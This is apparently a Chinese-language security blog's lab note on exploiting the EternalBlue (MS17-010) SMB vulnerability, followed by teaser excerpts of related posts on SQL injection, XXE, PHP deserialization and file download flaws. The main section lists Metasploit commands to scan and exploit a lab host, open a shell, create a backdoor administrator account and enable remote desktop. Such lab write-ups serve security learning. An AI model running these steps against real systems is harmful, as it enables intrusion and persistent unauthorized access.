永恒之蓝漏洞
永恒之蓝漏洞
SMB协议
用于共享文件夹
添加用户test2(win下):
1 | net user test2 123456 /add |
将用户加入管理员组:
1 | net localgroup administrators test2 /add |
添加成功
创建一个文件夹用于共享
访问共享文件夹:Win+R,输入 \\ip-address\path
在虚拟机中尝试访问:
查看445端口占用情况:
1 | netstat -ano | grep 445 |
靶场中漏洞利用
拓扑图
打开msfconsole
1 | msfconsole -q |
不使用-q
使用-q
扫描永恒之蓝漏洞
搜索永恒之蓝漏洞ms17-010
1 | search ms17-010 |
使用扫描工具
1 | use 3 |
设置远程主机的ip并执行
1 | set RHOSTS 192.168.2.169 |
利用永恒之蓝漏洞
利用永恒之蓝漏洞进行攻击,这里我们使用第0个工具
1 | use 0 |
注意这里defaulting to后的工具,我们待会儿将使用这个进行反向连接(因为需要受害者主机连接到我们监听的端口)
1 | set RHOSTS 192.168.2.169 |
创建后门账户
1 | shell |
现在输出的都是乱码,我们不喜欢,改一下
1 | chcp 65001 |
解决了乱码问题
现在创建一个后门用户
1 | net user test2 123456 /add |
退出shell
1 | exit |
开启远程桌面
meterpreter中:
1 | run /post/windows/manage/enable_rdp |
新建一个终端
1 | rdesktop 192.168.2.169 |
成功进入后门用户
相关推荐
2024-06-02
SQL注入学习笔记
前言本文是初学web安全时写的,有许多地方不够严谨,逻辑上也存在问题,请见谅~ SQL注入当客户端提交的数据未作处理或转义,直接带入数据库 具体来说,当Web应用程序对用户输入数据的合理性没有进行判断时,前端传入后端的参数就可能被攻击者所控制,并且根据这些参数带入数据库查询。攻击者可以通过构造不同的SQL语句来对数据库进行任意查询、增加、删除或修改等操作——->(通过构造一条精巧的语句来查询想要得到的信息 ) 分类 按照查询字段 字符型:当输入的参数为字符串时,称为字符型 数字型:当输入的参数为整形时,可以认为是数字型注入 按照注入方法 Union注入(联合注入) 报错注入 布尔注入 时间注入 注入点是可以实行注入的地方,通常是一个访问数据库的连接 比如 1http://2.0.0.1/sql/Less-1/index.php?id= //id这个地方就是一个注入点 判断字符型注入和数字型注入数字型一般提交内容为数字,但是数字不一定为数字型 1.使用and 1=1 和 and 1=2来判断 如果提交and 1=1 和 and...
2024-09-11
XXE学习笔记
前言本文是初学web安全时写的,有许多地方不够严谨,逻辑上也存在问题,请见谅~ XML与HTML的不同与html区别:html表示与数据相关,XML更多用于数据传输、存储 XML结构 123<?xml version="1.0"?>表示版本号,xml处理解析时的规范<Person>...</Person>表示根元素,XML文档需有且仅有一个根元素根元素内有两个赋值的嵌套标签子元素<Name></Name>,<Age></Age> 注意:元素标签名对大小写敏感 上述单独字符不能直接出现,会被错误解析 实体(ENTITIY)ENTITY就像XML中的变量,可以对其进行赋值,在XML文档的其他地方进行引用,实体在XML的文档类型定义部分(DTD)被单独定义描述 XML 文档的根元素通常与 DTD 中定义的根元素名称相匹配 12345678<!DOCTYPE Person [ <!ENTITY name...
2025-01-27
php反序列化漏洞
反序列化漏洞成因:反序列化unserialize()中接收的字符串可控,通过更改字符串得到想要的对象 php面向对象基础知识php中类和对象的写法1234567891011121314151617181920212223242526272829303132class Test{ var $name;//不推荐用var修饰,可以用public,private,protected修饰(与java一致) var $id; function __construct($name = null,$id = null){//构造函数 $this->name = $name; $this->id = $id; }}class Test{ var $name; var $id; function __construct($name = null,$id = null){ $this->name = $name; $this->id = $id; }}$a = new...
2024-10-14
任意文件下载漏洞学习笔记
前言本文是初学web安全时写的,有许多地方不够严谨,逻辑上也存在问题,请见谅~ 参考:https://blog.csdn.net/qq_43531669/article/details/116865660 什么是任意文件下载/读取?任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。 这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。 这里以 Pikachu 靶场的 unsafe filedownload...
2024-09-12
任意文件包含漏洞学习笔记
...
